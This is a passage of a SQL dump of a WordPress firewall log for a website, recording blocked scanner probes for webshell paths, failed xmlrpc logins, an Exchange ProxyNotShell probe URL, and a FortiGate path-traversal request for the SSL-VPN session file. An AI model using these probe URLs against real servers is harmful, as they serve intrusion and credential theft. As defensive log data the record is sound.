Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZG1pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133717,1699909438.182904,1699909438.174200,0x00000000000000000000FFFFC2A9AF9E,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/fields/cache/index.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2ZpZWxkcy9jYWNoZS9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133718,1699909436.169560,1699909436.148100,0x00000000000000000000FFFFC2A9AF9E,0,403,0,0,0,'https://eckankar-colorado.org/admin.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133719,1699911499.916594,1699911498.282200,0x00000000000000000000FFFF29D8BCA2,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133721,1699912612.349454,1699912612.344900,0x00000000000000000000FFFFC6C7735A,0,403,0,0,0,'https://173.231.231.205/autodiscover/autodiscover.json?%40zdi%2FPowershell=',NULL,'Mozilla/5.0 zgrab/0.x','blocked:waf','Exchange Proxy(Not?)Shell CVE-2022–41040 and CVE-2022–41082','{\"learningMode\":0,\"failedRules\":\"511\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"path\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"category\":\"rce\",\"ssl\":1}'),(133724,1699915180.182610,1699915180.173300,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/Update/wp-blog.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9VcGRhdGUvd3AtYmxvZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133735,1699929518.753033,1699929518.731300,0x00000000000000000000FFFF9CF91C20,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/core/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133725,1699915177.428964,1699915177.419600,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/colors/coffee/about.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvY29mZmVlL2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133734,1699925082.393789,1699925082.376800,0x00000000000000000000FFFF57FB40AF,0,403,0,0,0,'https://173.231.231.205/remote/fgt_lang?lang=%2F..%2F..%2F..%2F..%2F%2F%2F%2F%2F%2F%2F%2F%2F%2Fdev%2Fcmdb%2Fsslvpn_websession',NULL,NULL,'blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsYW5nXQ==\",\"paramValue\":\"Ly4uLy4uLy4uLy4uLy8vLy8vLy8vL2Rldi9jbWRiL3NzbHZwbl93ZWJzZXNzaW9u\",\"path\":\"L3JlbW90ZS9mZ3RfbGFuZw==\",\"category\":\"traversal\",\"ssl\":1}'),(133726,1699915174.265231,1699915174.255700,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/admin.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZG1pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133733,0.000000,1699921394.851632,0x00000000000000000000FFFF23EC0652,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(133727,1699915171.822216,1699915171.811800,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/fields/cache/index.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2ZpZWxkcy9jYWNoZS9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133731,0.000000,1699921394.447334,0x00000000000000000000FFFF23EC0652,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(133732,0.000000,1699921394.636540,0x00000000000000000000FFFF23EC0652,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(133728,1699915167.759736,1699915167.738000,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/admin.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133729,0.000000,1699916904.196388,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=4b9098f014','https://eckankar-colorado.org/wp-admin/admin.php?page=nf-submissions&form_id=61','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','logout',NULL,NULL),(133730,0.000000,1699921394.237068,0x00000000000000000000FFFF23EC0652,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(133738,1699930072.547752,1699930072.511500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133736,1699929486.688205,1699929486.665700,0x00000000000000000000FFFF9CF91C20,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133737,1699930107.564115,1699930107.536100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133769,1699930510.168077,1699930510.159300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-base64.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItYmFzZTY0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133739,1699930156.010234,1699930155.988800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133740,1699930192.711388,1699930192.689900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133741,1699930270.135812,1699930270.113700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133768,1699930468.298391,1699930468.283600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio.mp3.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8ubXAzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133742,1699930232.429494,1699930232.407900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133831,1699931028.349565,1699931028.340800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Text/Diff.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1RleHQvRGlmZi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133743,1699930280.892944,1699930280.884100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133744,1699930329.517937,1699930329.496100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133767,1699930473.817473,1699930473.801900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio.ogg.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8ub2dnLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133745,1699930318.077656,1699930318.069000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133746,1699930307.512563,1699930307.503900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133747,1699930296.476701,1699930296.467900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 